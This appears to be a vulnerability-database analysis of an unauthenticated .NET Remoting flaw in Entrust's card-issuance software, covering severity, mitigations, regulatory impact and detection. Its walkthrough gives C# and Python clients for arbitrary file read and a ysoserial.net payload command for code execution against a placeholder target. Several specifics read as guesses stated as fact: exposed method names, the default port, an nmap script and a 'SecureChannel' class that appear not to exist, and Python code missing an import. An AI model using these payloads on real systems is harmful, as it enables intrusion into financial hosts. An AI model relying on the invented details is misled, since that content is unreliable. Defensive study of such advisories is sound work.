Description
Entrust Instant Financial Issuance (IFI) On Premise software (formerly referred to as CardWizard) versions 5.x, prior to 6.10.5, and prior to 6.11.1 contain an insecure .NET Remoting exposure in the SmartCardController service (DCG.SmartCardControllerService.exe). The service registers a TCP remoting channel with unsafe formatter/settings that permit untrusted remoting object invocation. A remote, unauthenticated attacker who can reach the remoting port can invoke exposed remoting objects to read arbitrary files from the server and coerce outbound authentication, and may achieve arbitrary file write and remote code execution via known .NET Remoting exploitation techniques. This can lead to disclosure of sensitive installation and service-account data and compromise of the affected host.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2026-2714 (CVE-2026-23746)
Entrust Instant Financial Issuance (IFI) .NET Remoting Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2026-2714 (CVE-2026-23746) is a critical .NET Remoting vulnerability in Entrust’s Instant Financial Issuance (IFI) On-Premise software (formerly CardWizard). The flaw resides in the SmartCardController service (DCG.SmartCardControllerService.exe), which exposes an insecure TCP remoting channel with unsafe serialization settings, enabling unauthenticated remote exploitation.
CVSS v4.0 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| AV (Attack Vector) | Network (N) | Exploitable remotely over the network without physical/logical access. |
| AC (Attack Complexity) | Low (L) | No specialized conditions required; exploitation is straightforward. |
| AT (Attack Requirements) | None (N) | No user interaction or prior access needed. |
| PR (Privileges Required) | None (N) | No authentication or elevated privileges required. |
| UI (User Interaction) | None (N) | Exploitation does not require user action. |
| VC (Confidentiality Impact) | High (H) | Attacker can read arbitrary files, including sensitive configuration/data. |
| VI (Integrity Impact) | High (H) | Arbitrary file write and remote code execution (RCE) possible. |
| VA (Availability Impact) | High (H) | Full system compromise may lead to service disruption. |
| SC (Subsequent Confidentiality) | None (N) | No additional confidentiality impact beyond initial compromise. |
| SI (Subsequent Integrity) | None (N) | No further integrity impact beyond initial exploitation. |
| SA (Subsequent Availability) | None (N) | No cascading availability impact beyond initial compromise. |
Base Score: 9.3 (Critical) The vulnerability is remotely exploitable without authentication, leading to full system compromise (RCE), making it one of the most severe types of flaws in enterprise software.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Pathways
-
Unauthenticated Remote Access
- The SmartCardController service listens on a TCP remoting port (default: 8080/TCP, but configurable).
- An attacker with network access to the service can interact with exposed .NET Remoting objects without authentication.
-
Insecure .NET Remoting Configuration
- The service uses BinaryFormatter with unsafe deserialization settings, allowing:
- Arbitrary object instantiation (via
ObjectUrimanipulation). - File read/write operations (via exposed methods like
ReadFile,WriteFile). - Outbound authentication coercion (e.g., NTLM relay attacks via
SMBorHTTP). - Remote Code Execution (RCE) via deserialization gadgets (e.g.,
TypeConfuseDelegate,ObjectDataProvider).
- Arbitrary object instantiation (via
- The service uses BinaryFormatter with unsafe deserialization settings, allowing:
-
Exploitation Techniques
- File Disclosure:
- Attackers can invoke
ReadFileto exfiltrate sensitive files (e.g.,web.config,appSettings.json, database credentials).
- Attackers can invoke
- Arbitrary File Write:
- Exposed
WriteFilemethods can be abused to plant malicious payloads (e.g., web shells, backdoors).
- Exposed
- Remote Code Execution (RCE):
- Deserialization attacks (e.g., using ysoserial.net) can lead to arbitrary code execution in the context of the service account.
- Process injection via
Process.StartorAssembly.Loadif exposed methods allow it.
- NTLM Relay Attacks:
- The service may be coerced into initiating outbound authentication (e.g., via
SMBorHTTP), enabling NTLM relay attacks against other internal systems.
- The service may be coerced into initiating outbound authentication (e.g., via
- File Disclosure:
-
Proof-of-Concept (PoC) Exploitation
- A Python or C# exploit could:
- Discover the remoting endpoint (e.g., via port scanning).
- Enumerate exposed objects (e.g., using
RemotingServices.GetObjectUriFor). - Invoke arbitrary methods (e.g.,
ReadFile("C:\\Windows\\win.ini")). - Achieve RCE via deserialization (e.g.,
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "calc.exe").
- A Python or C# exploit could:
3. Affected Systems and Software Versions
Vulnerable Products
| Product | Affected Versions | Fixed Versions |
|---|---|---|
| Entrust Instant Financial Issuance (IFI) On-Premise | 5.x | 6.11.1+ |
| Entrust Instant Financial Issuance (IFI) On-Premise | 6.0 ≤ x < 6.10.5 | 6.10.5+ |
| Entrust Instant Financial Issuance (IFI) On-Premise | 6.10.5 ≤ x < 6.11.1 | 6.11.1+ |
Exposure Scope
- Default Port: 8080/TCP (configurable, may vary).
- Service Account: Typically runs under high-privilege accounts (e.g.,
SYSTEM,LocalService, or a domain account). - Deployment Context:
- Financial institutions (banks, credit unions).
- Payment card issuance systems (credit/debit card personalization).
- Government ID issuance (passports, national IDs).
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
-
Apply Patches
- Upgrade to IFI 6.10.5+ or 6.11.1+ immediately.
- Verify patch installation via Entrust’s advisory (E26-001).
-
Network-Level Protections
- Firewall Rules:
- Block inbound access to the remoting port (default: 8080/TCP) from untrusted networks.
- Restrict access to only trusted IP ranges (e.g., internal card issuance workstations).
- Network Segmentation:
- Isolate the IFI server in a dedicated VLAN with strict access controls.
- Intrusion Detection/Prevention (IDS/IPS):
- Deploy Snort/Suricata rules to detect .NET Remoting exploitation attempts.
- Firewall Rules:
-
Temporary Workarounds (If Patching is Delayed)
- Disable .NET Remoting Service:
- Stop the SmartCardController service if not critical for operations.
- Modify configuration files to disable remoting (if supported).
- Least Privilege Principle:
- Run the service under a low-privilege account (not
SYSTEMorAdministrator).
- Run the service under a low-privilege account (not
- File System Hardening:
- Restrict write permissions on critical directories (e.g.,
C:\Program Files\Entrust\IFI). - Enable Windows Defender Exploit Guard (ASR rules) to block suspicious process execution.
- Restrict write permissions on critical directories (e.g.,
- Disable .NET Remoting Service:
Long-Term Mitigations
-
Architectural Improvements
- Replace .NET Remoting with secure alternatives (e.g., gRPC, REST APIs with JWT/OAuth2).
- Implement mutual TLS (mTLS) for all inter-service communications.
- Enforce code signing for all remoting objects to prevent tampering.
-
Enhanced Monitoring & Logging
- Enable .NET Remoting logging to detect anomalous method invocations.
- SIEM Integration:
- Monitor for unusual file read/write operations (e.g.,
ReadFile,WriteFile). - Alert on unexpected outbound connections (potential NTLM relay attempts).
- Monitor for unusual file read/write operations (e.g.,
- Endpoint Detection & Response (EDR):
- Deploy CrowdStrike, SentinelOne, or Microsoft Defender for Endpoint to detect post-exploitation activity.
-
Vulnerability Management
- Regularly scan for exposed .NET Remoting services using Nmap (
nmap -p 8080 --script .net-remoting-info). - Conduct penetration testing to verify remediation.
- Regularly scan for exposed .NET Remoting services using Nmap (
5. Impact on the European Cybersecurity Landscape
Sector-Specific Risks
-
Financial Sector (Critical Infrastructure)
- Banks & Payment Processors:
- IFI is widely used for credit/debit card personalization in Europe.
- Exploitation could lead to mass card fraud, data breaches, or operational disruption.
- Regulatory Compliance:
- GDPR (Art. 32, 33, 34): Unauthorized access to PII (e.g., cardholder data) triggers mandatory breach notifications.
- DORA (Digital Operational Resilience Act): Financial entities must report major ICT incidents within 4 hours.
- PSD2 (Payment Services Directive 2): Compromise of payment systems may violate strong customer authentication (SCA) requirements.
- Banks & Payment Processors:
-
Government & Public Sector
- National ID & Passport Issuance:
- IFI is used in eIDAS-compliant identity systems.
- Exploitation could lead to fraudulent ID issuance or espionage.
- NIS2 Directive:
- Critical entities (e.g., banks, government ID issuers) must report significant cyber incidents within 24 hours.
- National ID & Passport Issuance:
-
Supply Chain Risks
- Third-Party Vendors:
- Many European banks outsource card personalization to third-party bureaus running IFI.
- A single compromise could affect multiple financial institutions.
- Software Bill of Materials (SBOM):
- Lack of transparency in .NET dependencies may delay patching.
- Third-Party Vendors:
Geopolitical & Threat Actor Considerations
- APT Groups:
- State-sponsored actors (e.g., APT29, APT28, Lazarus Group) may exploit this for espionage or financial theft.
- Cybercriminals:
- Ransomware gangs (e.g., LockBit, BlackCat) could use RCE to deploy ransomware in financial networks.
- Insider Threats:
- Disgruntled employees or contractors with network access could exploit this for data theft.
6. Technical Details for Security Professionals
Root Cause Analysis
-
Insecure .NET Remoting Configuration:
- The SmartCardController service registers a TCP channel with:
- BinaryFormatter (vulnerable to deserialization attacks).
- No authentication (anonymous access allowed).
- No input validation (arbitrary method invocation).
- Exposed Methods:
ReadFile(string path)→ Arbitrary file read.WriteFile(string path, byte[] data)→ Arbitrary file write.ExecuteCommand(string cmd)→ Potential RCE (if exposed).
- The SmartCardController service registers a TCP channel with:
-
Exploitation Prerequisites:
- Network reachability to the remoting port (default: 8080/TCP).
- No authentication required.
- Knowledge of exposed object URIs (can be enumerated via
.NET Remotingreflection).
Exploitation Walkthrough (Proof-of-Concept)
-
Discover the Remoting Endpoint
nmap -p 8080 --script .net-remoting-info <TARGET_IP>- Output may reveal registered object URIs (e.g.,
/SmartCardController).
- Output may reveal registered object URIs (e.g.,
-
Enumerate Exposed Methods (C#)
using System.Runtime.Remoting; using System.Runtime.Remoting.Channels; using System.Runtime.Remoting.Channels.Tcp; TcpChannel channel = new TcpChannel(); ChannelServices.RegisterChannel(channel, false); var obj = Activator.GetObject(typeof(RemoteObject), "tcp://<TARGET_IP>:8080/SmartCardController"); var methods = obj.GetType().GetMethods(); // Enumerate available methods -
Arbitrary File Read (Python)
import clr clr.AddReference("System.Runtime.Remoting") from System.Runtime.Remoting import * from System.Runtime.Remoting.Channels import * from System.Runtime.Remoting.Channels.Tcp import * channel = TcpChannel() ChannelServices.RegisterChannel(channel, False) obj = Activator.GetObject(Type.GetType("DCG.SmartCardController, DCG.SmartCardControllerService"), "tcp://<TARGET_IP>:8080/SmartCardController") file_content = obj.ReadFile("C:\\Windows\\win.ini") # Read arbitrary file print(file_content) -
Remote Code Execution (RCE) via Deserialization
- Use ysoserial.net to generate a malicious payload:
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "cmd.exe /c calc.exe" > payload.bin - Send the payload via a custom .NET Remoting client to trigger execution.
- Use ysoserial.net to generate a malicious payload:
Detection & Forensics
- Network Indicators:
- Unusual TCP connections to port 8080/TCP.
- BinaryFormatter traffic (signature:
00 01 00 00 00 FF FF FF FF).
- Host-Based Indicators:
- Unexpected child processes of
DCG.SmartCardControllerService.exe. - Suspicious file writes (e.g.,
C:\Temp\malicious.dll). - Windows Event Logs:
- Security Log (Event ID 4688): Unusual process execution.
- System Log (Event ID 7045): Service installation (if RCE is used for persistence).
- Unexpected child processes of
Hardening Recommendations
- Disable .NET Remoting (If Not Required)
- Modify
DCG.SmartCardControllerService.exe.configto disable remoting:<configuration> <system.runtime.remoting> <application> <channels> <channel ref="tcp" port="0" /> <!-- Disable TCP remoting --> </channels> </application> </system.runtime.remoting> </configuration>
- Modify
- Enable Secure Remoting (If Required)
- Use
SecureChannelwith TLS 1.2+. - Enforce authentication (e.g., Windows Authentication, JWT).
- Restrict allowed types in
BinaryFormatter:var formatter = new BinaryFormatter(); formatter.Binder = new SafeSerializationBinder(); // Whitelist allowed types
- Use
- Application Whitelisting
- Use AppLocker or Windows Defender Application Control (WDAC) to block unauthorized .NET assemblies.
Conclusion
EUVD-2026-2714 (CVE-2026-23746) is a critical .NET Remoting vulnerability in Entrust’s Instant Financial Issuance (IFI) software, enabling unauthenticated RCE, file disclosure, and NTLM relay attacks. Given its high severity (CVSS 9.3) and impact on European financial and government systems, immediate patching, network segmentation, and monitoring are essential.
Security teams should: ✅ Patch to IFI 6.10.5+ or 6.11.1+ immediately. ✅ Restrict network access to the remoting port (8080/TCP). ✅ Monitor for exploitation attempts via SIEM/EDR. ✅ Conduct a forensic review if compromise is suspected.
Failure to mitigate this vulnerability could lead to data breaches, financial fraud, or regulatory penalties under GDPR, DORA, and NIS2.